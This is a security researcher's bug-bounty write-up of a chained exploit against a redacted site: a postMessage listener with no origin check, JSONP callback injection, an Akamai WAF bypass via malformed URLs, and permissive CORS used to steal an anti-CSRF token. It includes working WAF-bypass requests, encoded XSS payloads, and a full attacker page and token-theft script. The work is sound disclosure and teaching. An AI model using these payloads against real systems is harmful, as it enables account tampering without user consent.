A few months ago, while hunting on a public bug-bounty programme, I found a nice little bug chain that involved

  • an insecure message event listener,
  • a shoddy JSONP endpoint,
  • a WAF bypass,
  • DOM-based XSS on an out-of-scope subdomain,
  • a permissive CORS configuration,

all to achieve CSRF against an in-scope asset. Read on for a deep dive about it.

Be aware that I’ve redacted some identifying information in order to protect the target organisation’s anonymity; I’ve also omitted some unimportant details in order to make the story of this bug chain more entertaining.

On the hunt for an elusive CSRF

The scope of my target’s bug-bounty programme was limited to a handful of subdomains of the organisation’s apex domain (all redacted here). At that point, I had run out of ideas for finding vulnerabilities there. The possibility of an exploitable cross-site request forgery (CSRF) lingered in my mind, though…

I had noticed that some in-scope subdomains could perform sensitive actions (such as updating the authenticated user’s profile) by issuing POST requests to endpoints rooted at an API host (also redacted). Authentication of such requests relied on ambient authority, in the form of a cookie named sid marked SameSite=None and Secure.

Unfortunately, those endpoints required, as a defence against CSRF, the presence of a token (tied to the authenticated user’s session) in a query parameter named csrftoken. Client code running in the context of those in-scope subdomains would retrieve that anti-CSRF token via an authenticated GET request to a dedicated API endpoint, which was accordingly configured for CORS.
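For context, in-scope client code presumably fetched the token along these lines. This is my own sketch, not the target’s code, and the endpoint URL is a placeholder:

```javascript
// Sketch (placeholder URL): how an in-scope page would retrieve its
// session-bound anti-CSRF token over a credentialed CORS request.
async function getCsrfToken() {
  const res = await fetch('https://api.example/csrftoken', {
    credentials: 'include' // the sid cookie supplies the ambient authority
  });
  const data = await res.json();
  return data.csrftoken;   // token tied to the user's session
}
```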

Furthermore, I couldn’t find a straightforward way to steal that anti-CSRF token from my victim. In my quest for CSRF, I had seemingly hit a brick wall.

A permissive CORS policy drives me out of scope

When my progress on a target stalls like this, I typically start exploring out-of-scope assets in the hope of discovering and abusing a trust relationship they have with some in-scope assets. After further testing the token endpoint, I realised that its CORS configuration allowed not just the expected in-scope origins, but any Web origin made up of an arbitrary subdomain of the apex domain:

$ curl -sD - -o /dev/null \
  -H "Origin: https://anything.<redacted>" \
  -H "Cookie: sid=xxx-yyy-zzz" \
  "https://<redacted>"
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://anything.<redacted>
Access-Control-Allow-Credentials: true
Vary: Origin

Therefore, if I could discover an instance of cross-site scripting (XSS) on any subdomain of the apex domain (even an out-of-scope one), I would be able to steal my victim’s anti-CSRF token and then mount CSRF attacks against the in-scope API endpoints. With this plan in mind, I set out to scrutinise the out-of-scope subdomains.

Insecure message event listener on out-of-scope subdomain

Equipped with Frans Rosén’s excellent postMessage-tracker Chrome extension, I quickly homed in on one such subdomain (redacted), which had an intriguing listener on 'message' events:

function handleMessageEvent(e) {
  try {
    var t = e;
    if (void 0 !== && (t =, "string" == typeof t) {
      try {
        t = JSON.parse(t)
      } catch (e) {
        return !1
      }
    }
    if (void 0 === t.method) return !1;
    var n, r = t.method.split(".");
    if (!(r.length > 0 && "APP" === r[0])) return !1;
    n = window;
    for (var a = 0; a < r.length; a++) {
      if (void 0 === n[r[a]]) {
        throw APP.Exception("COMMUNICATION_SECURITY");
      }
      n = n[r[a]]
    }
    if ("function" != typeof n) {
      throw APP.Exception("COMMUNICATION_SECURITY");
    }
    n(t.arg)
  } catch (e) {
    return !1
  }
}
The conspicuous absence of an origin check from that event listener implies that any malicious page (deployed anywhere on the Web) that holds a reference to a document loaded from the vulnerable subdomain can send that document malicious Web messages, and those messages would unconditionally get accepted and processed. With what impact? That entirely depends on the logic of the listener. A casual static analysis of the code indicates that, on its “happy path”, the message event listener does the following:

  1. Parses the event’s data property as JSON and stores the result in an object named t.
  2. Splits t’s method property on periods.
  3. Uses the result of step 2 to iteratively access nested properties of some window.APP object (declared elsewhere in the client).
  4. Calls the function thus obtained, passing it t’s arg property (see step 1) as the sole argument.
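The steps above can be sketched as a standalone dispatch function. This is my reconstruction for illustration, not the target’s code; note that nothing in it consults the sender’s origin:

```javascript
// Minimal model of the listener's dispatch logic: resolve "APP.x.y" to a
// nested function under `root` and invoke it with the message's `arg`.
function dispatch(data, root) {
  let msg = data;
  if (typeof msg === 'string') {
    try { msg = JSON.parse(msg); } catch (e) { return false; }
  }
  if (msg === null || typeof msg.method !== 'string') return false;
  const path = msg.method.split('.');
  if (path[0] !== 'APP') return false;
  let fn = root;
  for (const part of path) {
    fn = fn === undefined ? undefined : fn[part];
    if (fn === undefined) return false;
  }
  if (typeof fn !== 'function') return false;
  return fn(msg.arg); // single string argument, attacker-controlled
}
```

For example, `dispatch('{"method":"APP.util.greet","arg":"qux"}', { APP: { util: { greet: (s) => 'hi ' + s } } })` would call the nested greet function with 'qux'.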

In summary, my malicious page could send a specially crafted Web message to the vulnerable page in order to trigger the execution of some malicious JavaScript code in the context of the out-of-scope subdomain’s Web origin. For instance, consider the following string:

`{"method": "","arg": "qux"}`

On the condition that expression be defined and actually be a function, sending the aforementioned string as a Web message to the vulnerable page would lead the latter to execute the following JavaScript code:'qux')

Unfortunately, the listener’s logic limited this vector for DOM-based XSS to calls to functions accessible through the window.APP object, and with a single arbitrary argument of type string. Try as I might, I couldn’t find a way to access powerful DOM functionalities like eval or the Function constructor in order to escalate this finding to unrestricted DOM-based XSS. Faced with this constraint, I had no other option than to painstakingly explore the properties of the window.APP object.

Perhaps a simpler solution escaped me then; I have no doubt that perceptive readers who are XSS experts or who simply have perused Gareth Heyes’s recently released book, JavaScript for Hackers, will point one out to me. Gareth, I promise you that your book is next on my reading list!

Setting cookies across origins, to no avail

A function named APP.util.setCookie immediately stood out. As its name implies, it allowed callers to set arbitrary cookies on the out-of-scope subdomain’s domain. For example, a malicious cross-origin page could set a cookie named foo with value bar like so:

const win ='https://<redacted>/');
// omitted: wait a few seconds for the page to load
const msg = `{"method":"APP.util.setCookie", "arg":"foo=bar"}`;
win.postMessage(msg, '*');

The ability to set cookies across Web origins often helps Web attackers gain a foothold on their target: it may allow them to achieve session fixation, unlock otherwise seldom exploitable cookie-based XSS, defeat some implementations of the double-submit-cookie defence against CSRF, etc. Sadly, I could not find a way to abuse that APP.util.setCookie function to cause real damage.
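To make the double-submit-cookie point concrete, here is a hypothetical (purely illustrative) server-side check and why cross-origin cookie planting defeats it:

```javascript
// Hypothetical double-submit check: the server only verifies that the
// csrf cookie matches the csrf request parameter.
function doubleSubmitOk(cookies, params) {
  return typeof cookies.csrf === 'string' && cookies.csrf === params.csrf;
}

// An attacker who can plant the cookie cross-origin (e.g. via something
// like APP.util.setCookie) simply forges a request carrying the same value:
doubleSubmitOk({ csrf: 'attacker-chosen' }, { csrf: 'attacker-chosen' }); // true
```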

A shoddy JSONP endpoint leads to DOM-based XSS

However, a function named window.APP.apiCall eventually caught my eye:

function apiCall(t, n, r, a) {
    try {
        "/" !== t[0] && (t = "/" + t);
        var o = t.split("?"),
            i = [];
        if (o.length > 1 && (t = o[0],
                i = o[1].split("&")),
            t = "" + t,
            "get" !== n && i.push("request_method=" + n),
            null !== r)
            for (var c in r)
      , c) &&
                    i.push(c + "=" + encodeURIComponent(r[c]));
        null !== e.token && i.push("access_token=" + e.token),
            i.push("version=js-v" + e._version),
            loadScriptTag({ // function name redacted; loads the JSONP response as a <script>
                path: t,
                path_args: i,
                callback: a,
                callback_name: "callback"
            })
    } catch (t) {}
}

I’ll spare you the labyrinthine and irrelevant details of that function. Only two observations about window.APP.apiCall matter:

  • window.APP.apiCall is designed to send a request to a JSONP endpoint on the API host and load the response as an external script (in the context of the out-of-scope subdomain’s Web origin); and
  • window.APP.apiCall doesn’t build the JSONP URL in a particularly secure way.

Further dynamic tests on this JSONP endpoint revealed that it was protected by Akamai’s Web-application firewall (WAF). But I serendipitously discovered that, thanks to some questionable URL parsing on the server side, this obstacle could easily be bypassed. For an illustrative example, consider this first request and its 403 response from Akamai:

GET /get?output=jsonp&callback=alert('xss') HTTP/2
Host: <redacted>

HTTP/2 403 Forbidden
Server: AkamaiGHost

Now consider this second request (note the absence of a ? marking the beginning of the URL’s querystring) and its 200 response from the origin server:

GET /get&output=jsonp&callback=alert HTTP/2
Host: <redacted>

HTTP/2 200
Server: Apache
Content-Length: 59
Content-Type: text/javascript; charset=utf-8

alert({"error":{"msg":"Unknown path components: \/get"}})

Moreover, the JSONP endpoint was very lenient in the validation of its callback; on the condition that the value of the callback query parameter be (fully) doubly URL-encoded, the JSONP endpoint would accept it:

GET /get&output=jsonp&callback=alert%2528%2527xss%2527%2529%252f%252f HTTP/2
Host: <redacted>

HTTP/2 200
Content-Type: text/javascript; charset=utf-8

alert('xss')//({"error":{"msg":"Unknown path components: \/get"}})
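Producing such a doubly-encoded callback takes one subtlety into account: plain encodeURIComponent leaves ' ( ) untouched, so a stricter encoder (the well-known MDN "fixedEncodeURIComponent" pattern) must be applied twice. A sketch:

```javascript
// Strict percent-encoder: also escapes ! ' ( ) *, which
// encodeURIComponent leaves alone.
function strictEncode(str) {
  return encodeURIComponent(str).replace(
    /[!'()*]/g,
    (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase()
  );
}

const payload = "alert('xss')//";
strictEncode(strictEncode(payload));
// → "alert%2528%2527xss%2527%2529%252F%252F"
```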

Happy days! I could now craft a malicious page that would send the vulnerable page a Web message designed to trick it into hitting the JSONP endpoint with a payload of my choice. As a result, I could get arbitrary JavaScript code (e.g. alert(document.domain)) to execute in the context of that out-of-scope Web origin:

const url = 'https://<redacted>/';
const win =;
// omitted: wait a few seconds for the page to load
const msg = {
  'method': 'APP.apiCall',
  'arg': '&callback=alert%2528document.domain%2529%252f%252f&output=jsonp#'
};
win.postMessage(JSON.stringify(msg), '*');

Now armed with this unrestricted DOM-based XSS on the out-of-scope subdomain (whose origin, as you may recall, was allowed by the CORS configuration of the token endpoint), I had a way to steal my victim’s anti-CSRF token.

The need for one-click user interaction

In order to send Web messages to their intended destination, my malicious page first needed to acquire a reference to either an iframe or a window opened on the vulnerable page. Unfortunately, cross-origin framing was out of the question because all of my target’s responses invariably contained the following header:

X-Frame-Options: SAMEORIGIN

However, I could instead design my malicious page to open in a pop-up window at the expense of a modicum of user interaction—necessary for bypassing the browser’s pop-up blocker—such as clicking a button.

Putting it all together for a one-click CSRF

I deployed the following static page to a Web server under my control:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <script>
      function encode(str) {
        return encodeURIComponent(str).replace(
          /[!'()*]/g,
          (c) => `%${c.charCodeAt(0).toString(16).toUpperCase()}`,
        );
      }
      var win;
      function sendMsg() {
        const url = new URL("https://<redacted>/");
        if (typeof win === 'undefined') {
          win = open(url);
        }
        const delayMs = 2000;
        const payload = new URLSearchParams(location.search).get('payload');
        setTimeout(() => {
          const doubleEncodedPayload = encode(encode(`${payload}//`));
          const msg = {
            'method': 'APP.apiCall',
            'arg': `&callback=${doubleEncodedPayload}&output=jsonp#`
          };
          win.postMessage(JSON.stringify(msg), url.origin);
        }, delayMs);
      }
    </script>
  </head>
  <body>
    <input type=button value="Click me!" onclick="sendMsg();">
  </body>
</html>

The page consists of a single button; a click on it causes my malicious payload to execute on the vulnerable subdomain. Note that, for testing purposes, I opted to parameterise the malicious payload via a query parameter named payload. I also deployed the following JavaScript file to the same server:

async function stealToken() {
  const url = 'https://<redacted>';
  const opts = {method: 'POST', credentials: 'include'};
  return await fetch(url, opts)
    .then(body => body.json())
    .then(data => data.csrftoken);
}

async function csrf() {
  const token = await stealToken();
  const url = `https://<redacted>?csrftoken=${token}`;
  const randomString = (Math.random() + 1).toString(36).substring(7);
  const data = {'username': `PWNED_${randomString}`};
  const opts = {
    method: 'POST',
    credentials: 'include',
    body: JSON.stringify(data)
  };
  fetch(url, opts);
}

csrf();

I could then lure a victim authenticated on the target site to my malicious page, with its payload query parameter set to fetch and run the script above (full URL redacted).

If my victim subsequently clicked the button, she would unwittingly update her username on the target site to a telltale value of something like PWNED_ysp4d.


I promptly reported my findings through my target’s bug-bounty programme with a CVSS vector of AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N (7.1 High). According to their reward table, a High-severity finding paid just under €1,000. I was hopeful that, despite the need for user interaction, my perseverance and the complexity of my bug chain would compel the triage team to throw in a small bonus for good measure.

Unfortunately, the gnarliest bug chains don’t always turn out to be lucrative. For my report, I only got the princely sum of €200. And despite my repeated calls for a justification, the programme remained dead silent. You won’t be surprised to learn that I have no plans to spend any more time on that programme until they reassess their reward policy.

Ultimately, knowledge is its own reward, I suppose. If anything, this bug chain reinforced my belief that going out of scope is hardly ever a pointless exercise.


Thanks to renniepak and Tara Cooke, who both kindly agreed to review an early draft of this post.